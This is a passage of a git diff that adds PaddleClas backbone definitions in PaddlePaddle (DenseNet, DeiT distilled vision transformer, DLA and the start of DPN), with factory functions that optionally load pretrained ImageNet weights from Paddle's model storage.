self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + def forward(self, input): + y = self._conv(input) + y = self._batch_norm(y) + return y + + +class DenseNet(nn.Layer): + def __init__(self, layers=60, bn_size=4, dropout=0, class_num=1000): + super(DenseNet, self).__init__() + + supported_layers = [121, 161, 169, 201, 264] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + densenet_spec = { + 121: (64, 32, [6, 12, 24, 16]), + 161: (96, 48, [6, 12, 36, 24]), + 169: (64, 32, [6, 12, 32, 32]), + 201: (64, 32, [6, 12, 48, 32]), + 264: (64, 32, [6, 12, 64, 48]) + } + num_init_features, growth_rate, block_config = densenet_spec[layers] + + self.conv1_func = ConvBNLayer( + num_channels=3, + num_filters=num_init_features, + filter_size=7, + stride=2, + pad=3, + act='relu', + name="conv1") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_config = block_config + + self.dense_block_func_list = [] + self.transition_func_list = [] + pre_num_channels = num_init_features + num_features = num_init_features + for i, num_layers in enumerate(block_config): + self.dense_block_func_list.append( + self.add_sublayer( + "db_conv_{}".format(i + 2), + DenseBlock( + num_channels=pre_num_channels, + num_layers=num_layers, + bn_size=bn_size, + growth_rate=growth_rate, + dropout=dropout, + name='conv' + str(i + 2)))) + + num_features = num_features + num_layers * growth_rate + pre_num_channels = num_features + + if i != len(block_config) - 1: + self.transition_func_list.append( + 
self.add_sublayer( + "tr_conv{}_blk".format(i + 2), + TransitionLayer( + num_channels=pre_num_channels, + num_output_features=num_features // 2, + name='conv' + str(i + 2) + "_blk"))) + pre_num_channels = num_features // 2 + num_features = num_features // 2 + + self.batch_norm = BatchNorm( + num_features, + act="relu", + param_attr=ParamAttr(name='conv5_blk_bn_scale'), + bias_attr=ParamAttr(name='conv5_blk_bn_offset'), + moving_mean_name='conv5_blk_bn_mean', + moving_variance_name='conv5_blk_bn_variance') + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + stdv = 1.0 / math.sqrt(num_features * 1.0) + + self.out = Linear( + num_features, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, input): + conv = self.conv1_func(input) + conv = self.pool2d_max(conv) + + for i, num_layers in enumerate(self.block_config): + conv = self.dense_block_func_list[i](conv) + if i != len(self.block_config) - 1: + conv = self.transition_func_list[i](conv) + + conv = self.batch_norm(conv) + y = self.pool2d_avg(conv) + y = paddle.flatten(y, start_axis=1, stop_axis=-1) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def DenseNet121(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=121, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet121"], use_ssld=use_ssld) + return model + + +def DenseNet161(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=161, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet161"], use_ssld=use_ssld) + return model + + +def DenseNet169(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=169, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet169"], use_ssld=use_ssld) + return model + + +def DenseNet201(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=201, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet201"], use_ssld=use_ssld) + return model + + +def DenseNet264(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=264, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet264"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/distilled_vision_transformer.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/distilled_vision_transformer.py new file mode 100644 index 0000000..025d361 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/distilled_vision_transformer.py @@ -0,0 +1,270 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn +from .vision_transformer import VisionTransformer, Identity, trunc_normal_, zeros_ + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DeiT_tiny_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_tiny_patch16_224_pretrained.pdparams", + "DeiT_small_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_small_patch16_224_pretrained.pdparams", + "DeiT_base_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_patch16_224_pretrained.pdparams", + "DeiT_tiny_distilled_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_tiny_distilled_patch16_224_pretrained.pdparams", + "DeiT_small_distilled_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_small_distilled_patch16_224_pretrained.pdparams", + "DeiT_base_distilled_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_distilled_patch16_224_pretrained.pdparams", + "DeiT_base_patch16_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_patch16_384_pretrained.pdparams", + "DeiT_base_distilled_patch16_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_distilled_patch16_384_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class DistilledVisionTransformer(VisionTransformer): + def __init__(self, + img_size=224, + patch_size=16, + class_num=1000, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=False, + norm_layer='nn.LayerNorm', + epsilon=1e-5, + **kwargs): + super().__init__( + img_size=img_size, + patch_size=patch_size, + class_num=class_num, + embed_dim=embed_dim, + depth=depth, + num_heads=num_heads, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + 
norm_layer=norm_layer, + epsilon=epsilon, + **kwargs) + self.pos_embed = self.create_parameter( + shape=(1, self.patch_embed.num_patches + 2, self.embed_dim), + default_initializer=zeros_) + self.add_parameter("pos_embed", self.pos_embed) + + self.dist_token = self.create_parameter( + shape=(1, 1, self.embed_dim), default_initializer=zeros_) + self.add_parameter("cls_token", self.cls_token) + + self.head_dist = nn.Linear( + self.embed_dim, + self.class_num) if self.class_num > 0 else Identity() + + trunc_normal_(self.dist_token) + trunc_normal_(self.pos_embed) + self.head_dist.apply(self._init_weights) + + def forward_features(self, x): + B = paddle.shape(x)[0] + x = self.patch_embed(x) + + cls_tokens = self.cls_token.expand((B, -1, -1)) + dist_token = self.dist_token.expand((B, -1, -1)) + x = paddle.concat((cls_tokens, dist_token, x), axis=1) + + x = x + self.pos_embed + x = self.pos_drop(x) + + for blk in self.blocks: + x = blk(x) + + x = self.norm(x) + return x[:, 0], x[:, 1] + + def forward(self, x): + x, x_dist = self.forward_features(x) + x = self.head(x) + x_dist = self.head_dist(x_dist) + return (x + x_dist) / 2 + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def DeiT_tiny_patch16_224(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=192, + depth=12, + num_heads=3, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_tiny_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_small_patch16_224(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=384, + depth=12, + num_heads=6, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_small_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_base_patch16_224(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_tiny_distilled_patch16_224(pretrained=False, use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + patch_size=16, + embed_dim=192, + depth=12, + num_heads=3, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_tiny_distilled_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_small_distilled_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + patch_size=16, + embed_dim=384, + depth=12, + num_heads=6, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_small_distilled_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_base_distilled_patch16_224(pretrained=False, use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + 
qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_distilled_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_base_patch16_384(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_patch16_384"], + use_ssld=use_ssld) + return model + + +def DeiT_base_distilled_patch16_384(pretrained=False, use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + img_size=384, + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_distilled_patch16_384"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dla.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dla.py new file mode 100644 index 0000000..669055a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dla.py @@ -0,0 +1,526 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import math + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + +from paddle.nn.initializer import Normal, Constant + +from ppcls.arch.backbone.base.theseus_layer import Identity +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DLA34": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA34_pretrained.pdparams", + "DLA46_c": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA46_c_pretrained.pdparams", + "DLA46x_c": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA46x_c_pretrained.pdparams", + "DLA60": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA60_pretrained.pdparams", + "DLA60x": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA60x_pretrained.pdparams", + "DLA60x_c": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA60x_c_pretrained.pdparams", + "DLA102": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA102_pretrained.pdparams", + "DLA102x": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA102x_pretrained.pdparams", + "DLA102x2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA102x2_pretrained.pdparams", + "DLA169": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA169_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() + +zeros_ = Constant(value=0.) +ones_ = Constant(value=1.) 
+ + +class DlaBasic(nn.Layer): + def __init__(self, inplanes, planes, stride=1, dilation=1, **cargs): + super(DlaBasic, self).__init__() + self.conv1 = nn.Conv2D( + inplanes, + planes, + kernel_size=3, + stride=stride, + padding=dilation, + bias_attr=False, + dilation=dilation) + self.bn1 = nn.BatchNorm2D(planes) + self.relu = nn.ReLU() + self.conv2 = nn.Conv2D( + planes, + planes, + kernel_size=3, + stride=1, + padding=dilation, + bias_attr=False, + dilation=dilation) + self.bn2 = nn.BatchNorm2D(planes) + self.stride = stride + + def forward(self, x, residual=None): + if residual is None: + residual = x + + out = self.conv1(x) + out = self.bn1(out) + out = self.relu(out) + + out = self.conv2(out) + out = self.bn2(out) + + out += residual + out = self.relu(out) + + return out + + +class DlaBottleneck(nn.Layer): + expansion = 2 + + def __init__(self, + inplanes, + outplanes, + stride=1, + dilation=1, + cardinality=1, + base_width=64): + super(DlaBottleneck, self).__init__() + self.stride = stride + mid_planes = int( + math.floor(outplanes * (base_width / 64)) * cardinality) + mid_planes = mid_planes // self.expansion + + self.conv1 = nn.Conv2D( + inplanes, mid_planes, kernel_size=1, bias_attr=False) + self.bn1 = nn.BatchNorm2D(mid_planes) + self.conv2 = nn.Conv2D( + mid_planes, + mid_planes, + kernel_size=3, + stride=stride, + padding=dilation, + bias_attr=False, + dilation=dilation, + groups=cardinality) + self.bn2 = nn.BatchNorm2D(mid_planes) + self.conv3 = nn.Conv2D( + mid_planes, outplanes, kernel_size=1, bias_attr=False) + self.bn3 = nn.BatchNorm2D(outplanes) + self.relu = nn.ReLU() + + def forward(self, x, residual=None): + if residual is None: + residual = x + + out = self.conv1(x) + out = self.bn1(out) + out = self.relu(out) + + out = self.conv2(out) + out = self.bn2(out) + out = self.relu(out) + + out = self.conv3(out) + out = self.bn3(out) + + out += residual + out = self.relu(out) + + return out + + +class DlaRoot(nn.Layer): + def __init__(self, 
class DlaRoot(nn.Layer):
    """Aggregation node of a DLA sub-tree.

    Concatenates all child feature maps along channels, fuses them with a
    1x1 conv + BN, optionally adds the first child back (residual), ReLU.
    """

    # NOTE(review): the `class`/`def __init__` header was cut off by the patch
    # hunk boundary; reconstructed from the visible signature — confirm
    # against upstream PaddleClas.
    def __init__(self, in_channels, out_channels, kernel_size, residual):
        super(DlaRoot, self).__init__()
        # Fusion conv is fixed at kernel 1; padding still follows
        # `kernel_size`, mirroring the reference implementation.
        self.conv = nn.Conv2D(
            in_channels,
            out_channels,
            1,
            stride=1,
            bias_attr=False,
            padding=(kernel_size - 1) // 2)
        self.bn = nn.BatchNorm2D(out_channels)
        self.relu = nn.ReLU()
        self.residual = residual

    def forward(self, *x):
        children = x
        out = self.conv(paddle.concat(x, 1))
        out = self.bn(out)
        if self.residual:
            out += children[0]
        out = self.relu(out)
        return out


class DlaTree(nn.Layer):
    """Recursive deep-layer-aggregation tree; leaves are `block` instances
    whose outputs are merged by a DlaRoot."""

    def __init__(self,
                 levels,
                 block,
                 in_channels,
                 out_channels,
                 stride=1,
                 dilation=1,
                 cardinality=1,
                 base_width=64,
                 level_root=False,
                 root_dim=0,
                 root_kernel_size=1,
                 root_residual=False):
        super(DlaTree, self).__init__()
        # Default root width: both sub-tree outputs, plus the level input
        # when this tree is a level root.
        if root_dim == 0:
            root_dim = 2 * out_channels
        if level_root:
            root_dim += in_channels

        # Spatial downsampling only when stride > 1.
        self.downsample = nn.MaxPool2D(
            stride, stride=stride) if stride > 1 else Identity()
        self.project = Identity()
        cargs = dict(
            dilation=dilation, cardinality=cardinality, base_width=base_width)

        if levels == 1:
            # Leaf pair of blocks; project shortcut if widths differ.
            self.tree1 = block(in_channels, out_channels, stride, **cargs)
            self.tree2 = block(out_channels, out_channels, 1, **cargs)
            if in_channels != out_channels:
                self.project = nn.Sequential(
                    nn.Conv2D(
                        in_channels,
                        out_channels,
                        kernel_size=1,
                        stride=1,
                        bias_attr=False),
                    nn.BatchNorm2D(out_channels))
        else:
            # Recurse: the second sub-tree also aggregates the first.
            cargs.update(
                dict(
                    root_kernel_size=root_kernel_size,
                    root_residual=root_residual))
            self.tree1 = DlaTree(
                levels - 1,
                block,
                in_channels,
                out_channels,
                stride,
                root_dim=0,
                **cargs)
            self.tree2 = DlaTree(
                levels - 1,
                block,
                out_channels,
                out_channels,
                root_dim=root_dim + out_channels,
                **cargs)

        if levels == 1:
            self.root = DlaRoot(root_dim, out_channels, root_kernel_size,
                                root_residual)

        self.level_root = level_root
        self.root_dim = root_dim
        self.levels = levels

    def forward(self, x, residual=None, children=None):
        children = [] if children is None else children
        bottom = self.downsample(x)
        residual = self.project(bottom)

        if self.level_root:
            children.append(bottom)
        x1 = self.tree1(x, residual)

        if self.levels == 1:
            # Leaf: fuse both block outputs (and any collected children).
            x2 = self.tree2(x1)
            out = self.root(x2, x1, *children)
        else:
            children.append(x1)
            out = self.tree2(x1, children=children)
        return out


class DLA(nn.Layer):
    """Deep Layer Aggregation backbone (stem + 6 aggregation levels)."""

    def __init__(self,
                 levels,
                 channels,
                 in_chans=3,
                 cardinality=1,
                 base_width=64,
                 block=DlaBottleneck,
                 residual_root=False,
                 drop_rate=0.0,
                 class_num=1000,
                 with_pool=True):
        super(DLA, self).__init__()
        self.channels = channels
        self.class_num = class_num
        self.with_pool = with_pool
        self.cardinality = cardinality
        self.base_width = base_width
        self.drop_rate = drop_rate

        # 7x7 stem conv, stride 1 (resolution is reduced by level1/level2+).
        self.base_layer = nn.Sequential(
            nn.Conv2D(
                in_chans,
                channels[0],
                kernel_size=7,
                stride=1,
                padding=3,
                bias_attr=False),
            nn.BatchNorm2D(channels[0]),
            nn.ReLU())

        self.level0 = self._make_conv_level(channels[0], channels[0],
                                            levels[0])
        self.level1 = self._make_conv_level(
            channels[0], channels[1], levels[1], stride=2)

        cargs = dict(
            cardinality=cardinality,
            base_width=base_width,
            root_residual=residual_root)

        self.level2 = DlaTree(
            levels[2],
            block,
            channels[1],
            channels[2],
            2,
            level_root=False,
            **cargs)
        self.level3 = DlaTree(
            levels[3],
            block,
            channels[2],
            channels[3],
            2,
            level_root=True,
            **cargs)
        self.level4 = DlaTree(
            levels[4],
            block,
            channels[3],
            channels[4],
            2,
            level_root=True,
            **cargs)
        self.level5 = DlaTree(
            levels[5],
            block,
            channels[4],
            channels[5],
            2,
            level_root=True,
            **cargs)

        self.feature_info = [
            # rare to have a meaningful stride 1 level
            dict(
                num_chs=channels[0], reduction=1, module='level0'),
            dict(
                num_chs=channels[1], reduction=2, module='level1'),
            dict(
                num_chs=channels[2], reduction=4, module='level2'),
            dict(
                num_chs=channels[3], reduction=8, module='level3'),
            dict(
                num_chs=channels[4], reduction=16, module='level4'),
            dict(
                num_chs=channels[5], reduction=32, module='level5'),
        ]

        self.num_features = channels[-1]

        if with_pool:
            self.global_pool = nn.AdaptiveAvgPool2D(1)

        if class_num > 0:
            # 1x1 conv head keeps the classifier spatial until flatten().
            self.fc = nn.Conv2D(self.num_features, class_num, 1)

        # He-style init for convs, constant init for BN.
        for m in self.sublayers():
            if isinstance(m, nn.Conv2D):
                fan_out = m._kernel_size[0] * m._kernel_size[
                    1] * m._out_channels
                normal_ = Normal(mean=0.0, std=math.sqrt(2. / fan_out))
                normal_(m.weight)
            elif isinstance(m, nn.BatchNorm2D):
                ones_(m.weight)
                zeros_(m.bias)

    def _make_conv_level(self, inplanes, planes, convs, stride=1, dilation=1):
        """Stack `convs` conv-BN-ReLU units; only the first may stride."""
        layers = []
        for idx in range(convs):
            layers.extend([
                nn.Conv2D(
                    inplanes,
                    planes,
                    kernel_size=3,
                    stride=stride if idx == 0 else 1,
                    padding=dilation,
                    bias_attr=False,
                    dilation=dilation), nn.BatchNorm2D(planes), nn.ReLU()
            ])
            inplanes = planes
        return nn.Sequential(*layers)

    def forward_features(self, x):
        feat = self.base_layer(x)
        feat = self.level0(feat)
        feat = self.level1(feat)
        feat = self.level2(feat)
        feat = self.level3(feat)
        feat = self.level4(feat)
        feat = self.level5(feat)
        return feat

    def forward(self, x):
        out = self.forward_features(x)

        if self.with_pool:
            out = self.global_pool(out)

        if self.drop_rate > 0.:
            out = F.dropout(out, p=self.drop_rate, training=self.training)

        if self.class_num > 0:
            out = self.fc(out)
            out = out.flatten(1)

        return out


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Load weights per `pretrained`: False = none, True = download from
    `model_url`, str = local path. Raises RuntimeError otherwise."""
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )
# Model factories. Each accepts `use_ssld` (forwarded to the pretrained
# loader, consistent with the DPN factories in this patch) — previously the
# SSLD flag could not be requested at all from these entry points. The
# default `use_ssld=False` keeps existing callers unchanged.


def DLA34(pretrained=False, use_ssld=False, **kwargs):
    """DLA-34 with basic blocks."""
    model = DLA(levels=(1, 1, 1, 2, 2, 1),
                channels=(16, 32, 64, 128, 256, 512),
                block=DlaBasic,
                **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["DLA34"], use_ssld=use_ssld)
    return model


def DLA46_c(pretrained=False, use_ssld=False, **kwargs):
    """Compact DLA-46 with bottleneck blocks."""
    model = DLA(levels=(1, 1, 1, 2, 2, 1),
                channels=(16, 32, 64, 64, 128, 256),
                block=DlaBottleneck,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA46_c"], use_ssld=use_ssld)
    return model


def DLA46x_c(pretrained=False, use_ssld=False, **kwargs):
    """Compact DLA-46 with grouped (ResNeXt-style) bottlenecks."""
    model = DLA(levels=(1, 1, 1, 2, 2, 1),
                channels=(16, 32, 64, 64, 128, 256),
                block=DlaBottleneck,
                cardinality=32,
                base_width=4,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA46x_c"], use_ssld=use_ssld)
    return model


def DLA60(pretrained=False, use_ssld=False, **kwargs):
    """DLA-60 with bottleneck blocks."""
    model = DLA(levels=(1, 1, 1, 2, 3, 1),
                channels=(16, 32, 128, 256, 512, 1024),
                block=DlaBottleneck,
                **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["DLA60"], use_ssld=use_ssld)
    return model


def DLA60x(pretrained=False, use_ssld=False, **kwargs):
    """DLA-60 with grouped bottlenecks."""
    model = DLA(levels=(1, 1, 1, 2, 3, 1),
                channels=(16, 32, 128, 256, 512, 1024),
                block=DlaBottleneck,
                cardinality=32,
                base_width=4,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA60x"], use_ssld=use_ssld)
    return model


def DLA60x_c(pretrained=False, use_ssld=False, **kwargs):
    """Compact DLA-60 with grouped bottlenecks."""
    model = DLA(levels=(1, 1, 1, 2, 3, 1),
                channels=(16, 32, 64, 64, 128, 256),
                block=DlaBottleneck,
                cardinality=32,
                base_width=4,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA60x_c"], use_ssld=use_ssld)
    return model


def DLA102(pretrained=False, use_ssld=False, **kwargs):
    """DLA-102 with residual roots."""
    model = DLA(levels=(1, 1, 1, 3, 4, 1),
                channels=(16, 32, 128, 256, 512, 1024),
                block=DlaBottleneck,
                residual_root=True,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA102"], use_ssld=use_ssld)
    return model


def DLA102x(pretrained=False, use_ssld=False, **kwargs):
    """DLA-102 with grouped bottlenecks and residual roots."""
    model = DLA(levels=(1, 1, 1, 3, 4, 1),
                channels=(16, 32, 128, 256, 512, 1024),
                block=DlaBottleneck,
                cardinality=32,
                base_width=4,
                residual_root=True,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA102x"], use_ssld=use_ssld)
    return model


def DLA102x2(pretrained=False, use_ssld=False, **kwargs):
    """DLA-102 with 64-group bottlenecks and residual roots."""
    model = DLA(levels=(1, 1, 1, 3, 4, 1),
                channels=(16, 32, 128, 256, 512, 1024),
                block=DlaBottleneck,
                cardinality=64,
                base_width=4,
                residual_root=True,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA102x2"], use_ssld=use_ssld)
    return model


def DLA169(pretrained=False, use_ssld=False, **kwargs):
    """DLA-169 with residual roots."""
    model = DLA(levels=(1, 1, 2, 3, 5, 1),
                channels=(16, 32, 128, 256, 512, 1024),
                block=DlaBottleneck,
                residual_root=True,
                **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["DLA169"], use_ssld=use_ssld)
    return model


# ---------------------------------------------------------------------------
# Patch boundary: new file ppcls/arch/backbone/model_zoo/dpn.py
# ---------------------------------------------------------------------------
# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import sys +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DPN68": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN68_pretrained.pdparams", + "DPN92": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN92_pretrained.pdparams", + "DPN98": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN98_pretrained.pdparams", + "DPN107": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN107_pretrained.pdparams", + "DPN131": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN131_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + def forward(self, input): + y = self._conv(input) + y = self._batch_norm(y) + return y + + +class BNACConvLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(BNACConvLayer, self).__init__() + 
self.num_channels = num_channels + + self._batch_norm = BatchNorm( + num_channels, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + def forward(self, input): + y = self._batch_norm(input) + y = self._conv(y) + return y + + +class DualPathFactory(nn.Layer): + def __init__(self, + num_channels, + num_1x1_a, + num_3x3_b, + num_1x1_c, + inc, + G, + _type='normal', + name=None): + super(DualPathFactory, self).__init__() + + self.num_1x1_c = num_1x1_c + self.inc = inc + self.name = name + + kw = 3 + kh = 3 + pw = (kw - 1) // 2 + ph = (kh - 1) // 2 + + # type + if _type == 'proj': + key_stride = 1 + self.has_proj = True + elif _type == 'down': + key_stride = 2 + self.has_proj = True + elif _type == 'normal': + key_stride = 